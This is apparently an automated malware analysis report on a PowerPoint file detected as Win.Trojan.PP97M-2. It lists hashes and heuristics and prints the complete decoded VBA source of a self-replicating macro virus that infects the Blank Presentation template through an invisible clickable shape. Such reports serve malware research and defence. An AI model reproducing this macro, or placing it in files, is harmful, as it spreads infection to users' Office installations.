Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 51bd3c8835ff861e…

MALICIOUS

Office (OLE)

Size: 18.0 KB
Created: 1999-01-05 12:34:40
Authoring application: Microsoft PowerPoint
First seen: 2012-06-14
MD5: 08be660a2519f775187bebe0fb59d885
SHA-1: dd187fa23aae3bf048f0530449e1b88917cf7608
SHA-256: 51bd3c8835ff861e6eef4b0b68ae62643233869d8f6af6c12f96c2eddb369c21
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Win.Trojan.PP97M-2. The VBA macro attempts to achieve persistence by copying itself to the 'Blank Presentation.pot' template, potentially allowing it to run automatically when PowerPoint is opened. This persistence mechanism is a common tactic for malware.

Heuristics 2

  • ClamAV: Win.Trojan.PP97M-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.PP97M-2
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1772 bytes
SHA-256: d2350e438f66e268c9f5415bf8ea41e6e9bd4bccbadcbea1471af53dd5acb7d3
Detection
ClamAV: Win.Trojan.PP97M-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ShapeMaster"
'<!--1nternal-->
'PPT.ShapeMaster v0.1 /1nternal
Sub actionhook(ShapeMaster)
    On Error Resume Next
    If Int(Rnd * 7) = 0 Then
        Set Home = ActivePresentation
        Prev = 1
        Do
            Last = Prev
            Prev = InStr(Last + 1, Application.Path, "\")
        Loop While Prev <> 0
        Set templa = Presentations.Open(Left(Application.Path, Last) + "Templates\Blank Presentation.pot", , , msoFalse)
        dontadd = False
        For Each ModComponent In templa.VBProject.VBComponents
            If ModComponent.Name = "ShapeMaster" Then dontadd = True
        Next
        If dontadd <> True Then
            Set NewMod = templa.VBProject.VBComponents.Add(1)
            NewMod.Name = "ShapeMaster"
            NewMod.CodeModule.InsertLines 1, Home.VBProject.VBComponents("ShapeMaster").CodeModule.Lines(1, Home.VBProject.VBComponents("ShapeMaster").CodeModule.CountOfLines)
            Set ShapetoWack = templa.SlideMaster.Shapes.AddShape(1, 0, 0, templa.PageSetup.SlideWidth, templa.PageSetup.SlideHeight)
            With ShapetoWack
                .Name = "ShapeMaster"
                .ZOrder (msoSendToBack)
                .Line.Visible = False
                .Fill.Visible = False
                .ActionSettings(ppMouseClick).Action = ppActionRunMacro
                .ActionSettings(ppMouseClick).Run = "actionhook"
            End With
            templa.Save
        End If
        templa.Close
    End If
    If Int(Rnd * 10) = 0 Then
        ActivePresentation.SlideShowWindow.View.Previous
        If Int(Rnd * 5) = 0 Then MsgBox ("PPT.ShapeMaster v0.1 /1nternal")
    Else
        ActivePresentation.SlideShowWindow.View.Next
    End If
End Sub